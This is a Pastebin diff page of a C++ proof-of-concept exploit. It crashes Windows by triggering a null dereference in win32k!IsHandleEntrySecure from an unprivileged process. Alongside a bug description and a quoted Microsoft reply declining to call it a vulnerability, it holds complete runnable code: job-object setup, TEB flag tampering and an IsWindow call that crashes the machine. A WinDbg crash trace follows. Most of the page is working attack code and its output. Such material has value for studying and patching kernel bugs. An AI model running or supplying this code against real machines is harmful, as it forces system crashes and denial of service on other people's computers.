API tools faq
paste
View difference between Paste ID: we0ZSQC0 and D7W0cQE8
SHOW: | | - or go back to the newest paste.
1
//
2
// IsHandleEntrySecure_w32job_dereference_bsod.cpp
3
// @sixtyvividtails
4
//
5
//
6
// Function win32k!IsHandleEntrySecure() doesn't properly check if 'pW32Job' field of 'tagPROCESSINFO' for current
7
// process contains non-zero value. This allows unprivileged local user to cause null derefence in kernel mode (that's
8
// it, just bsod).
9
//
10
// NtUserValidateHandleSecure(win32Handle) ->
11
//     ValidateHandleSecure(win32Handle, 3) ->
12
//        IsHandleEntrySecure(win32Handle, pHandleEntry) -> bsod
13
//
14
//
15
// To get bsod, user should call NtUserValidateHandleSecure(), with following conditions:
16
// 1) Calling process SHOULD NOT be assigned to job.
17
// 2) Handle for validation should specify "owned" object (flags OCF_THREADOWNED or OCF_PROCESSOWNED).
18
// 3) Process which owns object SHOULD be assigned to job.
19
//
20
//
21
//
22
// IsHandleEntrySecure:
23
// ...
24
// .text:00149042 eax: current process processInfo
25
// .text:00149042 edx: handleEntry process processInfo
26
// .text:00149042
27
// .text:00149042 checkHandleInJob:                       ; CODE XREF: IsHandleEntrySecure(x,x)+48j
28
// .text:00149042         mov     ecx, [eax+tagPROCESSINFO.pW32Job] ; ecx: pW32Job of current process processInfo
29
// .text:00149048         cmp     [edx+tagPROCESSINFO.pW32Job], ecx
30
// .text:0014904E         jz      short ret_1
31
// .text:0014904E
32
// .text:00149050         mov     edx, [ecx+tagW32JOB.pgh] ; <<<<<<<  let's bsod here
33
// .text:00149053         xor     eax, eax
34
// .text:00149055         test    edx, edx
35
// .text:00149057         jz      short ret_eax
36
//
37
//
38
//
39
// Microsoft doesn't consider this as vulnerability. Their responce to my report of the bug:
40
//
41
// QUOTE START
42
// I looked through your report, and it appears to be a local DOS. Although this is an unfortunate bug, we don't
43
// consider it a security vulnerability according to our 10 immutable laws of security
44
// (http://technet.microsoft.com/library/cc722487.aspx). If you know how to exploit this bug without violating one of
45
// those laws, we would consider it a remote DOS which is considered a vulnerability.
46
//
47
// If you'd like to see this bug fixed, please contact Microsoft Product Support Services at
48
// http://support.microsoft.com/common/international.aspx. You may also want to try posting a message to our free
49
// support newsgroups. See Microsoft Product Support Newsgroups at http://support.microsoft.com/newsgroups/ for more
50
// information.
51
// QUOTE END
52
//
53
54
55
#include <conio.h>

56
#include <Windows.h>

57
#include <strsafe.h>

58
59
60
#pragma section(".shared", read, write, shared)

61
62
__declspec(allocate(".shared"))

63
HWND WindowHandle;

64
__declspec(allocate(".shared"))

65
HANDLE ChildWindowReadyEvent;

66
__declspec(allocate(".shared"))

67
HANDLE ParentProcess;

68
69
70
int go_first_instance()

71
{

72-
	wprintf(

72+
    wprintf(

73-
		L"IsHandleEntrySecure_w32job_dereference_bsod\n"

73+
        L"IsHandleEntrySecure_w32job_dereference_bsod\n"

74-
		L"@sixtyvividtails                 2013-11-12\n"

74+
        L"@sixtyvividtails                 2013-11-12\n"

75-
		L"\n");

75+
        L"\n");

76
77-
	// Make job for second process, and set some restrictions, so 'W32Job' field of 'tagPROCESSINFO' gets filled.

77+
    // Make job for second process, and set some restrictions, so 'W32Job' field of 'tagPROCESSINFO' gets filled.

78-
	HANDLE job = CreateJobObject(NULL, NULL);

78+
    HANDLE job = CreateJobObject(NULL, NULL);

79-
	JOBOBJECT_BASIC_UI_RESTRICTIONS uiRestrictions = {JOB_OBJECT_UILIMIT_WRITECLIPBOARD};

79+
    JOBOBJECT_BASIC_UI_RESTRICTIONS uiRestrictions = {JOB_OBJECT_UILIMIT_WRITECLIPBOARD};

80-
	SetInformationJobObject(job, JobObjectBasicUIRestrictions, &uiRestrictions, sizeof(uiRestrictions));

80+
    SetInformationJobObject(job, JobObjectBasicUIRestrictions, &uiRestrictions, sizeof(uiRestrictions));

81
82-
	STARTUPINFO si = {sizeof(si)};

82+
    STARTUPINFO si = {sizeof(si)};

83-
	PROCESS_INFORMATION pi = {};

83+
    PROCESS_INFORMATION pi = {};

84-
	CreateProcess(NULL, GetCommandLine(), NULL, NULL, TRUE, CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, &si, &pi);

84+
    CreateProcess(NULL, GetCommandLine(), NULL, NULL, TRUE, CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, &si, &pi);

85-
	if (!AssignProcessToJobObject(job, pi.hProcess))

85+
    if (!AssignProcessToJobObject(job, pi.hProcess))

86-
		return TerminateProcess(pi.hProcess, -1), wprintf(L"AssignProcessToJobObject failed\n");

86+
        return TerminateProcess(pi.hProcess, -1), wprintf(L"AssignProcessToJobObject failed\n");

87-
	auto me = GetCurrentProcess();

87+
    auto me = GetCurrentProcess();

88-
	DuplicateHandle(me, me, pi.hProcess, &ParentProcess, SYNCHRONIZE, FALSE, 0);

88+
    DuplicateHandle(me, me, pi.hProcess, &ParentProcess, SYNCHRONIZE, FALSE, 0);

89-
	HANDLE childWindowReady = CreateEvent(NULL, FALSE, FALSE, NULL);

89+
    HANDLE childWindowReady = CreateEvent(NULL, FALSE, FALSE, NULL);

90-
	DuplicateHandle(me, childWindowReady, pi.hProcess, &ChildWindowReadyEvent, EVENT_MODIFY_STATE, FALSE, 0);

90+
    DuplicateHandle(me, childWindowReady, pi.hProcess, &ChildWindowReadyEvent, EVENT_MODIFY_STATE, FALSE, 0);

91-
	ResumeThread(pi.hThread);

91+
    ResumeThread(pi.hThread);

92
93-
	// Wanna call 'NtUserValidateHandleSecure', but don't wanna hardcode func offsets or api numbers.

93+
    // Wanna call 'NtUserValidateHandleSecure', but don't wanna hardcode func offsets or api numbers.

94-
	// So, we can make user32 to call that function for us if we fake TIF_RESTRICTED flag in local tagCLIENTINFO

94+
    // So, we can make user32 to call that function for us if we fake TIF_RESTRICTED flag in local tagCLIENTINFO

95-
	// (Teb->Win32ClientInfo, its offsets are quite stable).

95+
    // (Teb->Win32ClientInfo, its offsets are quite stable).

96-
	BOOL x64 = FALSE;

96+
    BOOL x64 = FALSE;

97-
	__asm

97+
    __asm

98-
	{

98+
    {

99-
		xor eax, eax;

99+
        xor eax, eax;

100-
		mov ax, gs;

100+
        mov ax, gs;

101-
		mov x64, eax;

101+
        mov x64, eax;

102-
	}

102+
    }

103-
	// (note: no sanity checks here)

103+
    // (note: no sanity checks here)

104-
	PDWORD threadInfoFlags = x64?

104+
    PDWORD threadInfoFlags = x64?

105-
		PDWORD(__readfsdword(0xf70) + 0x800 + 0x1c):			// &teb->teb64->Win32ClientInfo.dwTIFlags

105+
        PDWORD(__readfsdword(0xf70) + 0x800 + 0x1c):            // &teb->teb64->Win32ClientInfo.dwTIFlags

106-
		PDWORD(__readfsdword(0x018) + 0x6cc + 0x14);			// &teb->Win32ClientInfo.dwTIFlags

106+
        PDWORD(__readfsdword(0x018) + 0x6cc + 0x14);            // &teb->Win32ClientInfo.dwTIFlags

107-
	*threadInfoFlags |= 0;				// die now if ptr invalid.

107+
    *threadInfoFlags |= 0;              // die now if ptr invalid.

108
109-
	WaitForSingleObject(childWindowReady, 7000);

109+
    WaitForSingleObject(childWindowReady, 7000);

110-
	wprintf(L"ready to bsod, HWND: %p\n"

110+
    wprintf(L"ready to bsod, HWND: %p\n"

111-
		L"press <enter> to continue...\n", WindowHandle);

111+
        L"press <enter> to continue...\n", WindowHandle);

112-
	_getwch();

112+
    _getwch();

113
114-
	*threadInfoFlags |= 0x20000000;		// TIF_RESTRICTED

114+
    *threadInfoFlags |= 0x20000000;     // TIF_RESTRICTED

115-
	IsWindow(WindowHandle);				// boom. Just indirect call to 'NtUserValidateHandleSecure()'.

115+
    IsWindow(WindowHandle);             // boom. Just indirect call to 'NtUserValidateHandleSecure()'.

116-
	// Could as well call NtUserValidateHandleSecure(WindowHandle) directly, without messing with teb.

116+
    // Could as well call NtUserValidateHandleSecure(WindowHandle) directly, without messing with teb.

117
118-
	// should not be here.

118+
    // should not be here.

119-
	wprintf(L"bsod failed, I am so sorry.\n");

119+
    wprintf(L"bsod failed, I am so sorry.\n");

120-
	return 0;

120+
    return 0;

121
}

122
123
124
int go_second_instance()

125
{

126-
	WindowHandle = CreateWindowEx(0, L"BUTTON", L"bsod", 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);

126+
    WindowHandle = CreateWindowEx(0, L"BUTTON", L"bsod", 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);

127-
	SetEvent(ChildWindowReadyEvent);

127+
    SetEvent(ChildWindowReadyEvent);

128-
	WaitForSingleObject(ParentProcess, INFINITE);

128+
    WaitForSingleObject(ParentProcess, INFINITE);

129-
	return 0;

129+
    return 0;

130
}

131
132
133
int main()

134
{

135-
	if (!ChildWindowReadyEvent)

135+
    if (!ChildWindowReadyEvent)

136-
		go_first_instance();

136+
        go_first_instance();

137-
	else

137+
    else

138-
		go_second_instance();

138+
        go_second_instance();

139
140-
	return 0;

140+
    return 0;

141
}

142
143
144
145
146
147
#if 0

148
stacktrace, win8 x64:

149
150
FOLLOWUP_IP: 

151
win32k!IsHandleEntrySecure+71

152
fffff960`002a7591 488b4a38        mov     rcx,qword ptr [rdx+38h]

153
154
SYMBOL_STACK_INDEX:  0

155
156
SYMBOL_NAME:  win32k!IsHandleEntrySecure+71

157
158
FOLLOWUP_NAME:  MachineOwner

159
160
MODULE_NAME: win32k

161
162
IMAGE_NAME:  win32k.sys

163
164
DEBUG_FLR_IMAGE_TIMESTAMP:  5216eef4

165
166
STACK_COMMAND:  .cxr 0xfffff880190d31b0 ; kb

167
168
BUCKET_ID_FUNC_OFFSET:  71

169
170
FAILURE_BUCKET_ID:  0x3B_win32k!IsHandleEntrySecure

171
172
BUCKET_ID:  0x3B_win32k!IsHandleEntrySecure

173
174
Followup: MachineOwner

175
---------

176
177
178
179
180
4: kd> k

181
Child-SP          RetAddr           Call Site

182
fffff880`190d28b8 fffff802`36876769 nt!KeBugCheckEx

183
fffff880`190d28c0 fffff802`368760bc nt!KiBugCheckDispatch+0x69

184
fffff880`190d2a00 fffff802`368e34bd nt!KiSystemServiceHandler+0x7c

185
fffff880`190d2a40 fffff802`3690b3d4 nt!RtlpExecuteHandlerForException+0xd

186
fffff880`190d2a70 fffff802`368e5216 nt!RtlDispatchException+0x458

187
fffff880`190d3180 fffff802`36876842 nt!KiDispatchException+0x455

188
fffff880`190d3840 fffff802`36874fba nt!KiExceptionDispatch+0xc2

189
fffff880`190d3a20 fffff960`002a7591 nt!KiPageFault+0x23a

190
fffff880`190d3bb0 fffff960`002a66bb win32k!IsHandleEntrySecure+0x71

191
fffff880`190d3be0 fffff960`002a75f4 win32k!ValidateHandleSecure+0x6405b

192
fffff880`190d3c10 fffff802`36876453 win32k!NtUserValidateHandleSecure+0x31

193
fffff880`190d3c40 00000000`77d72ad2 nt!KiSystemServiceCopyEnd+0x13

194
00000000`0011e688 00000000`77d72a9f wow64cpu!CpupSyscallStub+0x2

195
00000000`0011e690 00000000`77d8c4f6 wow64cpu!Thunk0Arg+0x5

196
00000000`0011e740 00000000`77d8b8f5 wow64!RunCpuSimulation+0xa

197
00000000`0011e790 000007fa`d342ff21 wow64!Wow64LdrpInitialize+0x435

198
00000000`0011ecd0 000007fa`d340655e ntdll!LdrpInitializeProcess+0x1576

199
00000000`0011efe0 000007fa`d343d3be ntdll!_LdrpInitialize+0xffffffff`fffc917e

200
00000000`0011f050 00000000`00000000 ntdll!LdrInitializeThunk+0xe

201
202
4: kd> r

203
rax=fffff880190d29c0 rbx=0000000000000000 rcx=000000000000003b

204
rdx=00000000c0000005 rsi=fffff880190ce000 rdi=fffff880190d4000

205
rip=fffff80236877440 rsp=fffff880190d28b8 rbp=fffff880190d2b70

206
 r8=fffff960002a7591  r9=fffff880190d31b0 r10=0000000000000000

207
r11=fffff80236b2e410 r12=0000000000000000 r13=0000000000000000

208
r14=fffff880190d3978 r15=fffff80236876453

209
iopl=0         nv up ei ng nz na po nc

210
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286

211
nt!KeBugCheckEx:

212
fffff802`36877440 48894c2408      mov     qword ptr [rsp+8],rcx ss:0018:fffff880`190d28c0=3b00000000000000

213
214
215
4: kd> .cxr 0xfffff880190d31b0

216
rax=0000000000000001 rbx=fffff90100407bc0 rcx=fffff90102966a60

217
rdx=0000000000000000 rsi=0000000000030528 rdi=0000000000030528

218
rip=fffff960002a7591 rsp=fffff880190d3bb0 rbp=0000000000000000

219
 r8=0000000000000000  r9=0000000077e5dc64 r10=fffff960002a75c4

220
r11=fffff880190d3be0 r12=000000007edab000 r13=000000000011fdb0

221
r14=000000000021fc20 r15=0000000077d72300

222
iopl=0         nv up ei ng nz na po nc

223
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286

224
win32k!IsHandleEntrySecure+0x71:

225
fffff960`002a7591 488b4a38        mov     rcx,qword ptr [rdx+38h] ds:002b:00000000`00000038=????????????????

226
4: kd> k

227
  *** Stack trace for last set context - .thread/.cxr resets it

228
Child-SP          RetAddr           Call Site

229
fffff880`190d3bb0 fffff960`002a66bb win32k!IsHandleEntrySecure+0x71

230
fffff880`190d3be0 fffff960`002a75f4 win32k!ValidateHandleSecure+0x6405b

231
fffff880`190d3c10 fffff802`36876453 win32k!NtUserValidateHandleSecure+0x31

232
fffff880`190d3c40 00000000`77d72ad2 nt!KiSystemServiceCopyEnd+0x13

233
00000000`0011e688 00000000`77d72a9f wow64cpu!CpupSyscallStub+0x2

234
00000000`0011e690 00000000`77d8c4f6 wow64cpu!Thunk0Arg+0x5

235
00000000`0011e740 00000000`77d8b8f5 wow64!RunCpuSimulation+0xa

236
00000000`0011e790 000007fa`d342ff21 wow64!Wow64LdrpInitialize+0x435

237
00000000`0011ecd0 000007fa`d340655e ntdll!LdrpInitializeProcess+0x1576

238
00000000`0011efe0 000007fa`d343d3be ntdll!_LdrpInitialize+0xffffffff`fffc917e

239
00000000`0011f050 00000000`00000000 ntdll!LdrInitializeThunk+0xe

240
241
#endif // #if 0
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!